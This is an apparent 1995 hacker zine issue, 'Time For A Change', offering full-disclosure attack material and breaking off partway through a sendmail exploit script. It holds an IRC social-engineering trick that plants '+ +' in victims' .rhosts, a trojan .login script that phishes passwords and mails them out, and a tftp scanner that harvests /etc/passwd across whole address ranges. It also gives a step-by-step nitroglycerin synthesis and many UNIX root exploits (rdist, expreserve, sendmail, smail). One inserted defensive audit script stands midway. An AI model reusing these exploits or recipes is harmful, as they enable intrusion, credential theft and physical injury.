TYM - Taking Your Machine PRESENTS

-+-+-====================================================================-+-+-

[ASCII-art banner]

-+-+-====================================================================-+-+-

Time For A Change
Volume 1 - Issue 1
February 23, 1995

-+-+-====================================================================-+-+-

INTRODUCTION
____________

Well, here is our first, long awaited issue. For those of you who don't know me, I'm Ghost in the Machine. I've been around the "scene" forever and a day, and I am quite sick of what it has degenerated into. This magazine is an attempt to break away from the no-disclosure bullshit and give everyone all the info they need to do whatever they want to do. This is an attempt at full-disclosure, useful information, while hopefully remaining entertaining to read.

Submissions for this magazine are accepted from anyone who has the desire to write an interesting article, and also has the ability to do so.
Send your submissions to:

  Ghost in the Machine @ Hackers Haven BBS (303) 343-4053
  or
  bf130@freenet.hsc.colorado.edu (Don't laugh, it's a stable maildrop)

You can also feel free to drop any comments, suggestions, complaints, etc.. off at either of those places.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
TABLE OF CONTENTS:

1. Finding new domains and playing with them.............Ghost in the Machine
2. Fun stuff to do on IRC................................Terminal
3. Pyrotechnics for the Serious Student:Nitro-Glycerine..Murcurochrome
4. UNIX Problems for fun and exploit: Part 1.............Ghost in the Machine
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----------------------------------------------------------------------------
Time for a Change presents
Finding new domains and playing with them.
by Ghost in the Machine
+----------------------------------------------------------------------------+

If you're like me, you will occasionally find yourself bored and want to find someplace new to hack. Coming up with a domain that you haven't already visited might be giving you some headaches, I know it gives them to me. Here are some pointers on how to find new systems, what to do once you have found one to gain easy access (if it exists), and some other neat net tools that you might not be familiar with.

- FINDING DOMAINS -

If you are on a system with any activity at all, you will find it easy to find new hosts by just checking the processes running on your host. Do a

  % ps -aux | grep telnet

or even better, look at all the processes and pipe it through more.

  % ps -aux | more

A lot of times, you will get people telnetting, rlogin'ing etc.. to different places.. a lot of times they are muds or whatever, which is kinda lame, but hell, it's someplace to start.

+ % finger @

  This will give you a list of all the people logged in, and many times, where they are on that host from.
  There are usually a handful from someplace nowhere near the host that you are fingering.

+ Read usenet. Preferably *security* newsgroups, as often times, stupid admins will leave valuable system weaknesses in posts, along with their login name, and host.

+ Jump on to IRC. Join random, heavily populated channels. Do a /who # . There should be a hefty load of new domains in just that. Some channels that usually have a lot of people on domestic machines are:

    #talk
    #
    #warez-#warez9 (these are usually filled with clueless wonders too, always a good time)
    #

+ Get on the www. Check out where the links are taking you, alas more domains to play with. Usually chock full of usernames.

+ I'm sure you can come up with plenty of other variations on this theme. Finding domains is easy, just pick something that appeals to you, and go at it.

- USING YOUR NEW DOMAINS -

Ok, the first thing you might want to do once you find a new domain is scan it for easily hacked backdoors. ISS (Internet Security Scanner) is a program that will do this for you, SATAN is another. I will include a uuencoded gzip of ISS 1.21 source with this issue. If you're really bored, you can scan by hand.

Important Note: Never, NEVER scan a domain with a non-expendable account. Most of the things that ISS does are easily logged and quite noticeable.

+ Question: I have a domain name, but I need the IP address to use with ISS.
  Answer: Use nslookup - nslookup is a program that will attach to a nameserver and translate domain to IP and vice versa. It's very easy to use. Type nslookup, then at the > prompt, type either fully qualified host names, or ip addresses. It will spit out the info you desire.

+ Question: Is there a way to easily scan a domain for default accounts?
  Answer: Yes - netfind. netfind is a handy program for finding accounts without actually entering the system. It is very versatile, and very helpful. % man netfind for complete instructions.

+ These are some easy ways to find stuff.
  I hope you find them useful.

-----------------------------------------------------------------------------
Time for a Change presents
Fun stuff to do on IRC.
by Terminal
------------------------------------------------------------------------------

The Intro:

By writing this text I intend to share some simple ideas on gaining accounts, and access on other systems while pissing around on IRC. I assume you, the reader, have a little experience with the commands of IRC... I don't know why, but I do... So let's get on with it.

The Beginning:

To find a person on a system of your choice try: /who -host . For example: "/who -host *att.com" would find all users on IRC coming from any host on ATT.COM.. Wildcards are indeed accepted. So find a victim that way, or if you are less picky, just join any channel, preferably one with a few users, and do a: "/who *".. that will list all users in the channel with nick, and mailing address... So, choose a user that looks interesting, and move on.

The Idea:

Well, we are just trying to accomplish one thing... to get the user to add "+ +" to his or her .rhosts file.. making any system a 'trusted' host, then allowing us to rlogin (Remote Login) to his or her system with no password... So, we have a few choices.. as you may have seen there are some popular IRC scripts.. IRC scripts are used by many people on IRC for whatever reason or another, and to get into their system you need only add a line to a popular IRC script, or make your own.. the line you would want to add would look like this: "exec echo + + > $HOME/.rhosts"... You don't have to give them an IRC script to get them to fix their .rhosts.. with a stupid user, and a bit of luck, you can have the user type it in himself. When actually typed while in IRC, you would need to add a '/' to the whole thing, making it: "/exec echo + + > $HOME/.rhosts"... Once the '+ +' is added to the .rhosts, you need only exit to shell..
and type: "rlogin -l ". For example, to rlogin to joblo@anysystem.com, you would need to type: "rlogin anysystem.com -l joblo" from your shell...

The Example:

*Victim* Dude, do you have any IRC scripts??
/whois Victim
*** Victim is victim@any.system.net (John Doe)
*** on channels: #oralsex
*** on irc via server irc-2.mit.edu ()
/exec echo "exec echo + + > $HOME/.rhosts" >> fenix.irc
/dcc send Victim fenix.irc
*** Sent DCC SEND request to Victim
*** DCC SEND connection to Victim[123.456.0.0,1383] established
*** DCC SEND:/home/myuser/fenix.irc to Victim completed 0.04004 kb/sec
/msg victim just type: /load fenix.irc
-> *victim* just type: /load fenix.irc
*Victim* Ok, I did... thanks.
/msg victim no problem.
-> *victim* no problem.
/quit I am lame
*** Signoff: me (I am lame)
% rlogin any.system.net -l victim
Last login: Tue Feb 14 16:49:42 from secure.bellcore.com
SunOS Release 4.1.3 (ANY) #2: Fri Sep 9 06:12:28 PDT 1994
Default terminal emulation is vt100
For temporary storage please use /tmp
You have mail.
ANY% exit
Connection closed.
%

The Other Idea:

If you want to try something different, you could give out a .login 'trojan' shell script, that when run replaces the user's .login file with a script which, when the user logs in next, will make it look like the user entered a wrong login name or password, and will prompt them to reenter it... Whatever is input then is mailed to the address in the script, so you would want to modify it with your own mailing address... You could distribute the script as anything you like, but it isn't an IRC script, so it needs to be run from the user's shell... If you are rlogin'ed to someone's account, you may want to run this on their account to try and get their passwd...
The Script:

----START SCRIPT----
#!/bin/sh
rm -rf $0
cp $HOME/.login $HOME/.l
echo ''>$HOME/.hushlogin
echo "stty intr '^@'
echo 'Login incorrect'
echo -n 'login: '
echo $<>.t
echo -n 'Password: '
stty -echo
echo $<>>.t
mail yourname@your.mail.account.com<.t
rm .t
cat /etc/motd
mv .l .login
rm .hushlogin
stty echo
source .login">$HOME/.login
----END SCRIPT----

===========================================================================
Time for a Change presents
Pyrotechnics for the Serious Student
Part I: Nitro Glycerine
by Murcurochrome (303)
------------------------------------------------------------------------------

Being the most experienced and knowledgable pyrotechnic in the state, I figured that it would be in all of our best concerns for me to write this article, instead of some lame-ass who steals all his ideas from the Anarchist Cookbook or the Terrorist Handbook without even trying any of them. I have made numerous explosives in my time, and now it is time for me to share them with you. I will be submitting new articles to each TYM release, and they will each include one recipe for some type of explosive.

First off, I have to say that I am in NO FUCKING WAY responsible for any dismemberment, or other harm that may come to you or anyone else. It's not my fault if you picked up this article and decided that you were a terrorist. For this reason, I have rated each one twice. One for difficulty in making, and one for danger in creating/using it. So, that's all I can do to make sure that you dumbasses don't think that nitroglycerin is easy and fun to make. So, lets begin.

Nitroglycerin C3H5(NO3)3
-------------------------------
Difficulty level [09]
Danger level [10]
--------------------------------------------------------

Nitroglycerin is the most dangerous and most potent explosive that I am going to teach you in this article.
It is highly volitile to bumps and jiggles, so I suggest that you merely read this article for the fun of knowing it, rather than actually making it. I've only made it a few times, and got away with it, but for you, it could prove dangerous. [01] Fill a 75-ml beaker to the 13ml line with fuming red nitric acid, of 98% concentration. [02] Place the beaker in an ice bath. Let it cool down below room temperature. [03] When it's done cooling, add it to 3x the amount of fuming sulfuric acid (of 99% concentration). [04] When done mixing, lower the temperature by adding more ice to the bath, to about 10-15øC [05] When the solution has cooled, it is ready to add glycerin. Be sure to add the glycerin slowing, THROUGH A MEDICINE DROPPER, ONE DROP AT A TIME. Do this carefully, until the entire surface of the solution is covered in glycerin. [06] Nitration will begin as soon as the glycerin is added. This will produce heat, but you MUST keep the solution below 30øC. If it begins to go higher, take the beaker out and pour it in the ice bath. This will prevent an explosion. [07] For the first 10 minutes of nitration, stir gently. Normally, a layer of nitroglycerin will form on top of it all. [08] After nitration, the entire beaker should be transferred SLOWLY and CAREFULLY to another beaker of water. The nitroglycerin should go to the bottom, and the excess acid and water can be drained off. [09] After removing as much acid as possible (* be sure not to disturb the nitroglycerin, it is highly volital at this point *), remove the NG with an eyedropper and place it in a sodium bicarbonate solution. This will neutralize most of the remaining acid. Keep doing this step, and testing with blue litmus paper until it shows no acid. [10] Finally, remove the NG from the bicarbonate with an eye dropper. Must I remind you to do this SLOWLY and CAREFULLY? NG has a very short shelf life, and is extremely unstable. 
The best way to keep NG around, is to convert it to dynamite by adding sawdust, or soap shavings.

-----------------------------------------------------------------------------
Time for a Change presents
UNIX problems, for fun and exploit. Volume 1.
(or how to get root in less than 5 minutes.)
by Ghost in the Machine
------------------------------------------------------------------------------

Well, I have yet to see a definitive guide to UNIX bugs, holes, etc.. with exploits, so I feel confident that I am not beating a dead horse with this series. Everyone seems to want to hack *NIX, and although the majority of bugs, holes, and other problems are easy to find if you know where to look, most people do not have any idea where to start looking. This series should give even the most incurably lame people a starting point. The current plan is to make this a 4 part series, however, as more and more goodies show up, one never knows.

Basically, here is an example for the format of the file:

 (vers) - - :

+++++
------------------------------------------------------------------------------
AIX (all?) - /bin/tprof - tprof -x executes programs suid 0 - root in 16 characters, how can you lose? :
% tprof -x /bin/sh
#
+++++
AIX (2.2.1) - /etc/shadow - /etc/shadow is o+w - Big oopsie. Thanks IBM! :
% echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow
% telnet localhost
Trying...
Connected to haqdnfuqd.com.
Escape character is '^]'.
login: rewt
#
+++++
AIX (3.X.X) - -froot - rlogind hole :
% rlogin localhost -l -froot
#
+++++
BSD (4.2), ULTRIX (3.0) - symbolic links broke - view any file you care to. :
% ln -s /etc/shadow /home/looser/.plan
% finger looser
Login: looser                           Name: looser
Directory: /home/looser                 Shell: /bin/sh
Last Login Fri May 13 22:10 (EST) on ttya1
No Mail.
+++++
DYNIX (3.0.14), ULTRIX (2.X) - sendmail bug - Can read any file. :
$ sendmail -C /etc/shadow
+++++
DYNIX (all?), IRIX (all?) - rsh problem - can execute commands as root.
:
$ rsh localhost -l "" /bin/sh
#
+++++
HP/UX (below 7.0) - chfn problem - chfn accepts newlines, etc... :
% chfn -f looser^Mrewt::0:0::/:/bin/sh
% rlogin localhost -l rewt
Warning: .lastlogin not found.
#
+++++
UNIX sendmail (Confirmed on SunOS perhaps others) - decode alias - uudecode :
% telnet fuqdhost.com 25
220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 ... Sender Okay
RCPT TO: decode
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R K"O\
end
.
250 Mail accepted
quit
221 fuqdhost.com closing connection
Connection closed by foreign host.
% rlogin fuqdhost.com -l bin
$
+++++
UNIX ALL - tftp - Can be used to grab /etc/passwd or any file you like - Most systems have fixed this. :
% tftp fuqdhost.com
tftp> get /etc/passwd
tftp> quit
% ls passwd
passwd
%

(For your scanning pleasure, I am including a short script written by Yo)
-------------------------------CUT HERE-------------------------------------
#!/bin/sh
########################################################################
# TFTP snagger by Yo
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
# scanns all hosts from XX.XX.0.0 - XX.XX.255.255
# you can run it in the background in following way:
# snag [hostname] > /dev/null &
# [hostname] might be used IP
# (with -ip option) as well as FQDN
#
#########################################################################
if [ $1x = x ]; then
  echo " Usage: $0 [hostname] to run in the foreground "
  echo " $0 [hostname] > /dev/null & to run in the background "
  echo " The [hostname] can be specialized in fully qualified domain name "
  echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
  echo " as well as IP with -ip option. "
  exit 1
else
  if [ "$1" = '-ip' ]; then
    if [ $2x = x ]; then
      echo " Usage: $0 $1 the IP "
      exit 1
    else
      x=`echo $2 | cut -c1-3`
      x1=`echo $x | cut -c2`
      if [ "$x1" = '.' ]; then
        x=`echo $x | cut -c1`
        xx=`echo $2 | cut -c3-5`
      else
        x1=`echo $x | cut -c3`
        if [ "$x1" = '.' ]; then
          x=`echo $x | cut -c1-2`
          xx=`echo $2 | cut -c4-6`
        else
          xx=`echo $2 | cut -c5-7`
        fi
      fi
      x1=`echo $xx | cut -c2`
      if [ "$x1" = '.' ]; then
        xx=`echo $xx | cut -c1`
      else
        x1=`echo $xx | cut -c3`
        if [ "$x1" = '.' ]; then
          xx=`echo $xx | cut -c1-2`
        else
          xx=`echo $xx | cut -c1-3`
        fi
      fi
    fi
  else
    if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
      # -x is for SunOs
      echo sorry dude, no nslookup server .. try it with -ip option.
      exit 1
    fi
    x=`nslookup $1 | fgrep "Address" | cut -c11-13 | tail +2`
    x1=`echo $x | cut -c2`
    if [ "$x1" = '.' ]; then
      x=`echo $x | cut -c1`
      xx=`nslookup $1 | fgrep "Address" | cut -c13-15 | tail +2`
    else
      x1=`echo $x | cut -c3`
      if [ "$x1" = '.' ]; then
        x=`echo $x | cut -c1-2`
        xx=`nslookup $1 | fgrep "Address" | cut -c14-16 | tail +2`
      else
        x=`echo $x | cut -c1-3`
        xx=`nslookup $1 | fgrep "Address" | cut -c15-17 | tail +2`
      fi
    fi
    x1=`echo $xx | cut -c2`
    if [ "$x1" = '.' ]; then
      xx=`echo $xx | cut -c1`
    else
      x1=`echo $xx | cut -c3`
      if [ "$x1" = '.' ]; then
        xx=`echo $xx | cut -c1-2`
      else
        xx=`echo $xx | cut -c1-3`
      fi
    fi
  fi
fi
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
  echo There is no such domain. Nothing to scan .
  exit 1
fi
xxx=0
xxxx=0
while [ $x -ne 255 ]; do
  while [ $xx -ne 255 ]; do
    while [ $xxx -ne 255 ]; do
      while [ $xxxx -ne 255 ]; do
        target=$x.$xx.$xxx.$xxxx
        trap "echo The Process was stoped at $target;rm -rf passwd; exit 1" 2
        tftp << EOF
c $target
mode ascii
trace
get /etc/passwd passwd
quit
EOF
        if [ !
-s passwd ] ; then rm -rf passwd echo `date` $target has rejected an attempt >> .info else mv passwd .good.$target echo `date` $target is taken,all data is stored in .good.$target file >> .info fi xxxx=`expr $xxxx + 1 ` done xxxx=0 xxx=`expr $xxx + 1 ` done xxx=0 xx=`expr $xx + 1 ` done xx=0 x=`expr $x + 1 ` done ---------------------------------CUT HERE----------------------------------- +++++ SunOS (<4.1.2), A/UX (2.0.1), SCO (3.2v4.2), Many others. - rdist(1) problem - Any user with access to rdist(1) can become root. : % cat > distfile HOSTS = fuqdhost FILES = w00p ${FILES} -> ${HOSTS} install /tmp/1; notify user; ^D % cat > usr.c main() { setuid(0); chown("goodie", 0, 0); chmod("goodie", 04755); exit(0); } ^D % cp /bin/sh ./goodie % cc -o usr usr.c % set path=( . $PATH) % setenv IFS / % rdist updating host localhost rdist: w00p: no such file or directory notify @fuqdhost ( user ) % goodie # +++++ UNIX (with rdist) - rdist buffer overflow hole - Make an suid shell. : ----------------------------------CUT HERE---------------------------------- #!/bin/sh SUID=/tmp/xtrek cat <<_EOF_ > test Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh $SUID Schmod 4755 $SUID _EOF_ cat test | /usr/ucb/rdist -Server localhost rm -rf test if [ -f $SUID ]; then echo "$SUID is a setuid shell. " fi # ----------------------------------CUT HERE----------------------------------- % rdist.sh /tmp/xtrek is a setuid shell. % /tmp/xtrek # +++++ UNIX (Many) - getpwent() hole - get /etc/shadow file. (not usually) : % cat > unshadow.c #include main(){struct passwd *p;while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n\r", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);} ^D % cc -o unshadow % unshadow > gotcha % cat gotcha +++++ UNIX (elm - all versions) - autoreply bug - any user with access to autoreply can become root. 
:
--------------------------------CUT HERE------------------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
  echo "Usage: `basename $0` rhosts-file user machine"
  exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a $MACHINE $USERNAME b"
umask 022
autoreply "a $MACHINE $USERNAME b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a $MACHINE $USERNAME b"
exit 0
--------------------------------CUT HERE------------------------------------
% ./fixrhosts ~root/.rhosts looser fuqdhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
% rsh fuqdhost -l root csh -i
#
+++++
UNIX (smail) - debug mode hole - Use of ~/.forward and debug lets a local user read any file on the system. :
% ln -s /etc/shadow .forward
% ls -la .forward
lrwxrwxrwx 1 looser lusers 11 Sep 5 12:08 .forward -> /etc/shadow
% telnet localhost smtp
Trying 127.0.0.1...
Connected to fuqdhost.
Escape character is '^]'.
220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 EST
debug 20
250 Debugging level: 20
expn looser
[lots of crap]
expand_string(~/.forward, /home/looser, looser) called
expand_string returns /home/looser/.forward
dtd_forwardfile: opening forward file /home/looser/.forward
[more crap]
read 890 bytes
director dotforward: matched looser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
looser:qWerTy3210xXx:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 looser ... not matched
quit
221 fuqdhost.lame.com closing connection
Connection closed by foreign host.
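Added here as a defender's companion to the entries above (this is editor-supplied example code, not from the zine or its authors): it audits a tree for the three conditions those entries depend on, a group- or world-accessible /etc/shadow (the AIX 2.2.1 entry), wildcard "+ +" lines in .rhosts or hosts.equiv (the IRC article's trick), and a .plan or .forward that is a symlink out of the home directory (the finger and smail symlink entries). Pass audit() "/" on a live host; build_sample_tree() constructs the sample tree the demo runs against.

```python
import os
import stat
import tempfile
from pathlib import Path

# Dotfiles that a privileged daemon reads on the user's behalf: fingerd
# (.plan/.project), smail/sendmail (.forward), rlogind/rshd (.rhosts).
DAEMON_READ_DOTFILES = (".plan", ".project", ".forward", ".rhosts")


def trust_lines(text):
    """Return the lines of an .rhosts / hosts.equiv body that grant wildcard trust.

    Each line is "host [user]"; a '+' in either field is a wildcard, so "+ +"
    (the line the IRC article gets victims to write) trusts every host and user.
    """
    bad = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host, user = fields[0], (fields[1] if len(fields) > 1 else "")
        if host == "+" or user == "+":
            bad.append(line)
    return bad


def shadow_findings(shadow):
    """A shadow file must be neither readable nor writable by group or other."""
    if not shadow.exists():
        return []
    mode = stat.S_IMODE(shadow.stat().st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        return [f"{shadow}: mode {mode:04o} exposes password hashes (expected 0600 or 0400)"]
    return []


def dotfile_findings(home):
    """A daemon-read dotfile that is a symlink out of the home directory makes
    the daemon read (or, for smail -D, write) that target with its privileges."""
    out = []
    home_real = os.path.realpath(home)
    for name in DAEMON_READ_DOTFILES:
        p = home / name
        if p.is_symlink():
            target = os.path.realpath(p)
            if os.path.commonpath([home_real, target]) != home_real:
                out.append(f"{p}: symlink to {target} outside {home}")
    return out


def audit(root):
    """Check root/etc/shadow, root/etc/hosts.equiv and every root/home/* entry."""
    root = Path(root)
    findings = shadow_findings(root / "etc" / "shadow")
    equiv = root / "etc" / "hosts.equiv"
    if equiv.is_file():
        findings += [f"{equiv}: wildcard trust: {l!r}" for l in trust_lines(equiv.read_text())]
    home_root = root / "home"
    if home_root.is_dir():
        for home in sorted(home_root.iterdir()):
            rh = home / ".rhosts"
            if rh.is_file() and not rh.is_symlink():
                findings += [f"{rh}: wildcard trust: {l!r}" for l in trust_lines(rh.read_text())]
            findings += dotfile_findings(home)
    return findings


def build_sample_tree(base):
    """Constructed sample tree (not taken from any real host): one of each
    weakness plus a clean user, so the audit has something to find and skip."""
    base = Path(base)
    (base / "etc").mkdir()
    shadow = base / "etc" / "shadow"
    shadow.write_text("root:x:8000:0:99999:7:::\n")  # constructed, no real hash
    shadow.chmod(0o666)                                # the AIX o+w oopsie
    (base / "etc" / "hosts.equiv").write_text("trusted.example.test\n")
    victim = base / "home" / "victim"
    victim.mkdir(parents=True)
    (victim / ".rhosts").write_text("+ +\n")           # what fenix.irc writes
    (victim / ".plan").symlink_to("/etc/shadow")       # the finger symlink entry
    looser = base / "home" / "looser"
    looser.mkdir()
    (looser / ".forward").symlink_to("/etc/shadow")    # the smail debug entry
    clean = base / "home" / "clean"
    clean.mkdir()
    (clean / ".rhosts").write_text("# one named host only\nhost.example.test clean\n")
    (clean / ".forward").write_text("clean@mail.example.test\n")
    return base


def run_demo():
    """Build the constructed tree in a temp dir and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The demo reports four findings (the shadow mode, the "+ +" line, and the two symlinked dotfiles) and nothing for the clean user.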
+++++
UNIX (smail) - smail create/append hole - Smail called with the -D flag will allow you to create and append to any file on the system. :
% cat ~/.forward
localhost loser
^D
% smail -bs -D ~root/.rhosts -v20
220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 EST
expn looser
250 looser
quit
221 fudqhost.lame.com closing connection
% rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
#
+++++
UNIX (smail) - .forward problem - Files specified in ~/.forward can be created in any directory, regardless of its permissions. (File is still owned by mailbox owner, however.) :
% echo "/etc/nologin" > ~/.forward
% mail -r root loser < /dev/null
% echo "Site shutdown due to smail lameness" >! /etc/nologin
% rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
+++++
UNIX (expreserve) - expreserve bug :
----------------------------------CUT HERE-----------------------------------
/*
 * Exploit a security hole in expreserve on sun4.1.3
 * filename
 * overwrites filename as root with garbage, chown's to you
 * (note, a 4.1.1 test overwrote with no chown
 * the first 4 characters written are "+ +\n"
 * which can be used to overwrite anyones .rhosts as root)
 */
#include
#include
#define HBLKS 2
#define FNSIZE 128
#define BLKS 900
typedef struct {
  time_t time;
  int uid;
  int flines;
  char name[FNSIZE];
  short Blocks[BLKS];
  short encrypted;
} header;

main(argc,argv)
int argc;
char **argv;
{
  int p,u;
  header H;
  struct passwd *pw;
  char buf[100],*dest;
  if(argc!=2) {
    printf("usage: %s destination\n",argv[0]);
    exit(1);
  }
  dest = argv[1];
  p = getpid();
  pw = getpwuid(getuid());
  sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
  symlink(dest,buf);
  close(0);
  if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
    printf("Cant open Ex (temp file)\n");
    exit(2);
  }
  /* fill out header so that expre thinks its legit */
  H.time = 12345;              /* who cares */
  strcpy(&H.time,"+ +\n");     /* its a long, we got some free bytes in there*/
  strcpy(H.name,"NoName");
  H.flines = 0;
  H.uid = getuid();
  H.Blocks[0] = HBLKS;
  H.Blocks[1] = HBLKS+1;
  write(0,&H,sizeof(H));
  lseek(0,0,0);
  printf("Made temp file 'Ex'. You can remove it when done.\n");
  execl("/usr/lib/expreserve","expreserve",0);
  printf("Couldnt exec!\n");
}
--------------------------------CUT HERE------------------------------------
% cc -o xp xp.c
% id
uid=666(looser) gid=50(luser) groups=50(luser)
% xp /home/doofus/.rhosts
% rlogin fuqdhost -l doofus
% id
uid=303(doofus) gid=50(luser) groups=50(luser)
%
+++++
SunOS 5.2 (sendmail 8.6.X) - sendmail bug - can get a root shell :
---------------------------------CUT HERE-----------------------------------
#!/bin/sh
# exploit new sendmail bug to give us a root shell
# 24 mar 94 jwa/scd @nau.edu
# "short version"
# tested on sunos 5.2/sendmail 8.6.4

# location of sendmail
SENDMAIL=/usr/lib/sendmail
# location of original sendmail.cf file
CONFIG=/nau/local/lib/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL | grep sendmail.cf`
# program to execute as root
SHELL=/bin/csh
TEMPDIR=/tmp/sendbug-tmp.$$

mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR
cp $SENDMAIL sm
chmod 700 sm

echo "Creating setid0 ..."
cat > setid.c << _EOF_
/* set uid to zero, thus escaping the annoying csh and solaris sh
 * problem..
 *
 *   if (getuid() != geteuid()) {
 *     printf("permission denied, you root-hacker you.\n");
 *     exit(1);
 *   }
 *
 * .. must be run euid 0, obviously. with no args it runs /bin/sh,
 * otherwise it runs the 1st arg.
 */
#include
main(argc, argv)
int argc;
char *argv[];
{
  int uid;
  setuid(0);
  setgid(0);
  seteuid(0); /* probabally redundant. */
  setegid(0);
  uid = getuid();
  if (uid != 0) {
    printf("setuid(0); failed! aborting..\n");
    exit(1);
  }
  if (argc !=2) {
    printf("executing /bin/sh...\n");
    system("/bin/sh");
  } else {
    printf("executing %s...\n", argv[1]);
    system(argv[1]);
  }
}
_EOF_
cc -o setid0 setid.c

echo "Creating calc..."
cat > calc.c << _EOF_
/*
 * Determines offset in sendmail of
 * sendmail.cf file location.
 * author: timothy newsham
 */
#include
gencore()
{
  int pid;
  int fd[2];
  if(pipe(fd) < 0) {
    perror("pipe");
    exit(1);
    return(0);
  }
  pid = fork();
  if(!pid) {
    int f = open("./out", O_RDWR|O_CREAT, 0666);
    dup2(f, 1);
    dup2(fd[0], 0);
    close(f);
    close(fd[1]);
    close(fd[0]);
    execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
    perror("exec");
    exit(0);
  } else {
    sleep(2);
    kill(pid, 11);
  }
  close(fd[0]);
  close(fd[1]);
}
main(argc,argv)
char **argv;
int argc;
{
  unsigned int ConfFile,tTdvect,off;
  gencore();
  sync(); /* grr. */
  tTdvect = find("ZZZZZZZZ", "core");
  ConfFile = find(argv[1], "core");
  if(!tTdvect || !ConfFile) {
    return(1);
  }
  off = ConfFile - tTdvect;
  printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",
    off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \
    off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);
}
int find(pattern, file)
char *pattern,*file;
{
  int fd;
  int i, addr;
  char c;
  fd = open(file, 0);
  i = 0;
  addr = 0;
  while(read(fd, &c, 1) == 1) {
    if(pattern[i] == c)
      i++;
    else
      i=0;
    if(pattern[i] == '\0') {
      addr -= strlen(pattern);
      return(addr);
    }
    addr++;
  }
  return(0);
}
_EOF_
cc calc.c -o calc

echo "Scanning core image for $CONFIG..."
